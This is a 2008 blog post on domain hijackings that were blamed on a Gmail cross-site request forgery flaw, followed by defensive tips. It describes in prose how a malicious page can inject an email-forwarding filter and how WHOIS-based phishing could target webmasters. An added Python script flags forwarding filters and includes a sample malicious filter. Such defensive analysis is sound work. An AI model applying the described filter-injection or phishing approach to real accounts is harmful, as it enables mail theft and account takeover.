
Sunday, November 23, 2008

New GMail Exploit Or Old Cross-Site Scripting Vulnerability

Earlier this month MakeUseOf.com's domain was stolen right out from underneath them: it was hijacked and moved to another registrar. On Friday they provided us with the details of how they think the would-be thief took control of their domain and moved it to another host.

In their post titled "BREAKING: New Gmail Security Flaw. More Domains Get Stolen!", MakeUseOf.com said they suspect that the hacker used some hole in GMail to create filters which forwarded crucial emails to the thieves. That in turn gave the thieves access to their GoDaddy account (among other things) and let them move the domains.

In what appears to be two completely separate incidents, both Cucirca.com and YouMP3.org were hit by the same thief in the same exact manner. The owners of each site contacted MakeUseOf.com and confirmed that similar filters had been placed in their GMail accounts and their domains had been transferred. The details provided were identical down to the thief's email address.

These attacks don't seem to be the first, however; in fact MakeUseOf points out that the same thing happened to David Airey last year.

Last year a serious cross-site request forgery (CSRF) vulnerability was found in Gmail and allegedly fixed. Security researcher Petko Petkov provided details of the vulnerability on his blog, which was then confirmed and supposedly fixed by Google. However the three attacks above seem to mirror directly what Petkov's hijack did.

The victim visits a page while being logged into GMail. Upon execution, the page performs a multipart/form-data POST to one of the GMail interfaces and injects a filter into the victim's filter list. In the example above, the attacker writes a filter, which simply looks for emails with attachments and forwards them to an email of their choice. This filter will automatically transfer all emails matching the rule. Keep in mind that future emails will be forwarded as well. The attack will remain present for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.

So was the hijack that David Airey, MakeUseOf.com, Cucirca.com and YouMP3.org were hit by a new exploit, or did Google neglect to fix the cross-site request forgery vulnerability described above?

The fact is there really is no way to tell at this point. GMail seems to be one of the only common denominators on the user end. We do know that for the CSRF exploit to affect their accounts, they all had to either visit the same site or view the same email, or something along those lines.

One thing that piqued my interest is that the CSRF exploit has been around for over a year and this is the first I've heard of anyone hijacking GMail accounts in this fashion. That is not to say it hasn't happened; it just happens that the guy finally hijacked someone who put the information into the spotlight. The CSRF exploit could be used to hijack anything and would be virtually undetectable until someone went looking, so it is possible there have been many attacks that have gone unnoticed.

For the hijacker to use Petkov's CSRF exploit to target webmasters he essentially has to create a "perfect storm". He'd have to get the exploit to them in some fashion, probably via an email sent to their GMail accounts; remember, they have to be logged in to those accounts for it to work. Those accounts would have to be associated in some way with the webmasters' domains. Either the registrar of the domain would have to have that particular email address on file for password retrieval, or the email address on file would have to be forwarded through the affected GMail account, so it could then be forwarded out to the hijacker.

From what I see, that is a lot of variables that would have to go right for this to happen.

For this particular scenario to play out and be lucrative, a hijacker (or team of hijackers) would more than likely have to go on a phishing expedition and target multiple webmasters who showed GMail addresses in their WhoIs records. They would then have to send out several emails with the CSRF exploit code. It would have to be a "good" email that these webmasters would want to open, allowing the exploit to work and the filters to be placed.

Aibek over at MakeUseOf makes a pretty good observation of how this could work:

In my opinion the hack was carried out in the following way:

1. hacker has an automatic script that searches public WhoIs databases and finds people that have gmail email listed as a contact.
2. the script further filters the results leaving only somewhat established sites.
3. next he sends an email to the owner (or even leaves a comment on his blog) with a link to a site that targets Gmail bug.

Aibek

As of right now there is no verification that the hijacking was the result of a vulnerability in GMail. However, the evidence is leaning that way. If you are concerned that you might be vulnerable, there are a couple of things you can do to combat this.

Check your GMail settings and make sure you aren't already compromised. Check your forwarding options and filters to make sure you aren't forwarding information to unknown addresses. Disable any options you aren't using, such as IMAP and POP.
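As an added example (not part of the original post): a small Python audit that scans an exported filter list for the kind of filter Petkov described, i.e. one that forwards mail to an address you don't control. It assumes the list is in Gmail's Atom-style filter export format (one `entry` per filter, each with `apps:property` name/value pairs); the sample feed below is constructed, and `thief@attacker.invalid` is a placeholder.

```python
import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Constructed sample in the assumed export shape. The second entry mirrors the
# injected filter from the post: match anything with an attachment, forward it
# out, and archive the original so the owner never notices it arriving.
SAMPLE_EXPORT = """<feed xmlns='http://www.w3.org/2005/Atom'
      xmlns:apps='http://schemas.google.com/apps/2006'>
  <entry>
    <apps:property name='from' value='newsletter@example.org'/>
    <apps:property name='label' value='News'/>
  </entry>
  <entry>
    <apps:property name='hasAttachment' value='true'/>
    <apps:property name='forwardTo' value='thief@attacker.invalid'/>
    <apps:property name='shouldArchive' value='true'/>
  </entry>
</feed>"""


def parse_filters(xml_text):
    """Return one {property_name: value} dict per filter entry."""
    root = ET.fromstring(xml_text)
    return [
        {p.get("name"): p.get("value") for p in entry.iter(APPS + "property")}
        for entry in root.iter(ATOM + "entry")
    ]


def suspicious_filters(filters, trusted_forward_domains):
    """Flag filters that forward mail anywhere outside the trusted domains."""
    flagged = []
    for f in filters:
        target = f.get("forwardTo")
        if not target or target.rsplit("@", 1)[-1].lower() in trusted_forward_domains:
            continue
        reasons = ["forwards to untrusted address " + target]
        if f.get("hasAttachment") == "true":
            reasons.append("matches every message carrying an attachment")
        if f.get("shouldArchive") == "true":
            reasons.append("archives the original so the owner never sees it")
        flagged.append((target, reasons))
    return flagged


if __name__ == "__main__":
    for target, reasons in suspicious_filters(parse_filters(SAMPLE_EXPORT), {"example.com"}):
        print(target, "->", "; ".join(reasons))
```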

I suggest using a private email address for your accounts. There is no reason for your domains to be registered to your public contact address, or even filtered through that address. Use a personal email address from your ISP and keep that information private.

Using Firefox with the NoScript add-on should help block cross-site scripting exploits.

Stay away from emails and sites you aren't sure of; you should never open suspicious emails anyway.

Update all your software. Since there is no proof this was a CSRF exploit, it's still possible it was malware, a virus or even a trojan. Keep all your AV software up to date, especially if your personal computer is also used for business.

Change your passwords often. Again, since there is no confirmation of how the hijackers got in, it is possible that the accounts were cracked. The accounts weren't locked out, so that's not likely, but it is still possible.

**Update:** Google has posted a response on the Google Online Security Blog stating there is no known vulnerability and this was a case of phishing. For more details please see our follow-up post.